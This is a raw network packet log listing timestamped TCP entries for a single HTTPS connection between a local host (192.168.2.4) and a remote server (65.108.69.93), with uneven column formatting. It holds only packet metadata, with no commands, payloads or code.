May 8, 2024 16:41:15.477396011 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477406979 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477408886 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.477421999 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477467060 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.477473974 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477483034 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477504969 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477514029 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.477536917 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.477547884 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477557898 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477566957 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.477575064 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477602005 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.477607965 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477627039 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477637053 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.477649927 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477662086 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.477668047 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477694035 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.477701902 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477716923 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477742910 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.477751017 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477775097 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.477792025 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477811098 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477813005 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.477819920 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477839947 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.477864981 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477866888 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.477875948 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477896929 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477921963 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477943897 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.477948904 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477962971 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477979898 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.477992058 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.478005886 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.478017092 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.478023052 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.478051901 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.478060007 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.478074074 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.478096008 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.478101969 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.478127003 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.478131056 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.478143930 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.478178024 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.478184938 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.478194952 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.478195906 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.478213072 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.478245974 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.478251934 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.478262901 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.478262901 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.478279114 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.478331089 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.478334904 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.478347063 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.478354931 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.478360891 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.478390932 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.478400946 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.478415966 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.478420973 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.478431940 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.478446007 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.478451967 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.478482962 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.478494883 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.478501081 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.478528976 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.478539944 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.478550911 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.478559017 CEST  443          49743      65.108.69.93  192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478574038 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478576899 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478585958 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478621006 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478629112 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478635073 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478641987 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478655100 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478682995 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478688955 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478703022 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478703022 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478722095 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478725910 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478733063 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478754044 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478782892 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478785992 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478792906 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478807926 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478836060 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478843927 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478854895 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478862047 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478877068 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478884935 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478890896 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478915930 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478945017 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478952885 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478960991 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478972912 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.478990078 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479001045 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479006052 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479027987 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479034901 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479043961 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479058981 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479063988 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479093075 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479104996 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479111910 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479140997 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479146957 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479161978 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479167938 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479176998 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479193926 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479202032 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479224920 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479233980 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479248047 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479259014 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479264021 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479295015 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479300976 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479317904 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479320049 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479326963 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479347944 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479373932 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479377985 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479386091 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479410887 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479424953 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479432106 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479444027 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479458094 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479465008 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479490995 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479496956 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479509115 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479513884 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479531050 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479537010 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479542017 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479573011 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479583025 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479595900 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479621887 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479629040 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479649067 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479656935 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479670048 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479690075 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479696035 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479722023 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479723930 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479738951 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479748964 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479753971 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479777098 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479789019 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479804039 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.479808092 CEST49743443192.168.2.465.108.69.93
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
May 8, 2024 16:41:15.479815006 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.479832888 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.479861021 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.479866982 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.479876995 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.479897022 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.479917049 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.479923964 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.479933977 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.479935884 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.479952097 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.479957104 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.479963064 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.479988098 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.480011940 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480024099 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480024099 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.480034113 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480053902 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.480078936 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.480087042 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480108023 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480143070 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.480146885 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480158091 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480159998 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.480182886 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480200052 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.480206966 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480217934 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480231047 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480232000 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.480251074 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.480257034 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480283022 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480290890 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.480303049 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480319023 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.480324984 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480357885 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.480362892 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480380058 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480382919 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.480390072 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480410099 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.480439901 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480447054 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.480454922 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480472088 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480487108 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.480496883 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.480499983 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480525970 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480530977 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.480544090 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480555058 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.480561018 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480595112 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.480604887 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480622053 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480628014 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.480633020 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480655909 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.480673075 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480686903 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480690956 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.480701923 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480720043 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.480736017 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480746031 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.480761051 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480776072 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480792999 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.480818033 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.480828047 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480840921 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480874062 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.480879068 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480891943 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.480909109 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480916977 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.480927944 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480942011 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.480959892 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.480990887 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.480998039 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.481007099 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.481033087 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.481043100 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.481050014 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.481059074 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.481070042 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.481076956 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.481113911 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.481120110 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.481131077 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.481138945 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.481147051 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.481170893 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.481178045 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.481199026 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.481200933 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.481218100 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.481225967 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.481230974 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.481256008 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.481262922 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.481275082 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.481281996 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.481288910 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.481303930 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.481316090 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.481332064 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.481334925 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.481343985 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.481362104 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.481384993 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.481393099 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.481405020 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.481442928 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.481456041 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.481462002 CEST  443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.481488943 CEST  49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.481524944 CEST  49743        443        192.168.2.4    65.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.538511038 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.798918009 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.798979998 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.799034119 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.799060106 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.799082994 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.799101114 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.803122997 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.803141117 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.803235054 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.803251982 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.803303957 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.803397894 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.803412914 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.803520918 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.803528070 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.803572893 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.803651094 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.803667068 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.803739071 CEST49743443192.168.2.465.108.69.93
